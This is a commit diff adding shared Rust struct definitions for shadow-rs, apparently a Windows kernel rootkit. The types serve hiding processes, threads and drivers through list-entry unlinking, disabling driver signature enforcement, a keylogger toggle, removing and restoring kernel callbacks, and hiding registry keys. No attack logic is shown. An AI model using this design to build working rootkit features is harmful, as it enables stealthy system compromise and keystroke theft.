shadow-rs

2026-01-28 19:54:29 +01:00 · 2024-07-26 12:28:36 -03:00
commit e8d3a20f51
53 changed files with 6837 additions and 0 deletions
--- a/shared/src/structs/callback_struct.rs
+++ b/shared/src/structs/callback_struct.rs
@@ -0,0 +1,27 @@
+use crate::vars::Callbacks;
+
+// Callback Information for Enumeration (Output)
+#[repr(C)]
+#[derive(Debug)]
+pub struct CallbackInfoOutput {
+    pub address: usize,
+    pub name: [u16; 256],
+    pub index: u8,
+}
+
+// Callback Information for Action (Input)
+#[repr(C)]
+#[derive(Debug)]
+pub struct CallbackInfoInput {
+    pub index: usize,
+    pub callback: Callbacks
+}
+
+// 
+#[repr(C)]
+#[derive(Debug)]
+pub struct CallbackRestaure {
+    pub index: usize,
+    pub callback: Callbacks,
+    pub address: u64,
+}
--- a/shared/src/structs/driver_struct.rs
+++ b/shared/src/structs/driver_struct.rs
@@ -0,0 +1,37 @@
+extern crate alloc;
+
+use core::sync::atomic::AtomicPtr;
+use super::LIST_ENTRY;
+use ntapi::ntldr::LDR_DATA_TABLE_ENTRY;
+
+// Enumerate Drivers
+#[repr(C)]
+pub struct DriverInfo {
+    pub address: usize,
+    pub name: [u16; 256],
+    pub index: u8,
+}
+
+// Enable / Disable DSE
+#[repr(C)]
+#[derive(Debug)]
+pub struct DSE {
+    pub enable: bool
+}
+
+// Structure that stores the values of the process that has been hidden
+#[repr(C)]
+#[derive(Debug)]
+pub struct HiddenDriverInfo  {
+    pub name: alloc::string::String,
+    pub list_entry: AtomicPtr<LIST_ENTRY>,
+    pub driver_entry: AtomicPtr<LDR_DATA_TABLE_ENTRY>,
+}
+
+// Represents a drivers information, including its name and a flag indicating whether it should be hidden or not
+#[repr(C)]
+#[derive(Debug, Default)]
+pub struct TargetDriver {
+    pub name: alloc::string::String,
+    pub enable: bool,
+}
--- a/shared/src/structs/mod.rs
+++ b/shared/src/structs/mod.rs
@@ -0,0 +1,38 @@
+#![allow(non_camel_case_types)]
+#![allow(non_snake_case)]
+
+use crate::vars::Options;
+
+pub mod process_struct;
+pub mod thread_struct;
+pub mod callback_struct;
+pub mod driver_struct;
+pub mod registry_struct;
+pub mod module_struct;
+
+pub use process_struct::*;
+pub use driver_struct::*;
+pub use thread_struct::*;
+pub use callback_struct::*;
+pub use registry_struct::*;
+pub use module_struct::*;
+
+// Custom LIST_ENTRY
+#[repr(C)]
+pub struct LIST_ENTRY {
+    pub Flink: *mut LIST_ENTRY,
+    pub Blink: *mut LIST_ENTRY,
+}
+
+// Keylogger
+#[repr(C)]
+#[derive(Debug)]
+pub struct Keylogger {
+    pub enable: bool
+}
+
+// Input for information that needs to be listed
+#[repr(C)]
+pub struct EnumerateInfoInput {
+    pub options: Options
+}
--- a/shared/src/structs/module_struct.rs
+++ b/shared/src/structs/module_struct.rs
@@ -0,0 +1,8 @@
+// Enumerate Modules
+#[repr(C)]
+#[derive(Debug)]
+pub struct ModuleInfo {
+    pub address: usize,
+    pub name: [u16; 256],
+    pub index: u8,
+}
--- a/shared/src/structs/process_struct.rs
+++ b/shared/src/structs/process_struct.rs
@@ -0,0 +1,56 @@
+use core::sync::atomic::AtomicPtr;
+use super::LIST_ENTRY;
+
+// Stores the information of the process that has been hidden
+#[repr(C)]
+#[derive(Debug)]
+pub struct HiddenProcessInfo  {
+    pub pid: usize,
+    pub list_entry: AtomicPtr<LIST_ENTRY>
+}
+
+// Stores process information
+#[repr(C)]
+#[derive(Debug)]
+pub struct ProcessListInfo {
+    pub pids: usize,
+}
+
+// Stores information about the target process.
+#[repr(C)]
+#[derive(Debug, Default)]
+pub struct TargetProcess {
+    pub pid: usize,
+}
+
+// Anti-create Process
+#[repr(C)]
+#[derive(Debug, Default)]
+pub struct AntiCreateProcess {
+    pub name: &'static str
+}
+
+// Process Info Hide
+#[repr(C)]
+#[derive(Debug, Default)]
+pub struct ProcessInfoHide {
+    pub pid: usize,
+    pub enable: bool,
+}
+
+// Signature information for the target process
+#[repr(C)]
+#[derive(Debug)]
+pub struct ProcessSignature {
+    pub pid: usize,
+    pub sg: usize,
+    pub tp: usize,
+}
+
+// Stores the process to be protected
+#[repr(C)]
+#[derive(Debug)]
+pub struct ProcessProtection {
+    pub pid: usize,
+    pub enable: bool
+}
--- a/shared/src/structs/registry_struct.rs
+++ b/shared/src/structs/registry_struct.rs
@@ -0,0 +1,10 @@
+extern crate alloc;
+
+// Stores the target registry
+#[repr(C)]
+#[derive(Debug, Default)]
+pub struct TargetRegistry {
+    pub key: alloc::string::String,
+    pub value: alloc::string::String,
+    pub enable: bool
+}
--- a/shared/src/structs/thread_struct.rs
+++ b/shared/src/structs/thread_struct.rs
@@ -0,0 +1,33 @@
+use core::sync::atomic::AtomicPtr;
+use super::LIST_ENTRY;
+
+// Structure that stores the values of the process that has been hidden
+#[repr(C)]
+#[derive(Debug)]
+pub struct HiddenThreadInfo  {
+    pub tid: usize,
+    pub list_entry: AtomicPtr<LIST_ENTRY>
+}
+
+// Stores the target thread
+#[repr(C)]
+#[derive(Debug, Default)]
+pub struct TargetThread {
+    pub tid: usize,
+    pub enable: bool,
+}
+
+// Stores thread information
+#[repr(C)]
+#[derive(Debug)]
+pub struct ThreadListInfo {
+    pub tids: usize,
+}
+
+// Stores the thread to be protected
+#[repr(C)]
+#[derive(Debug)]
+pub struct ThreadProtection {
+    pub tid: usize,
+    pub enable: bool
+}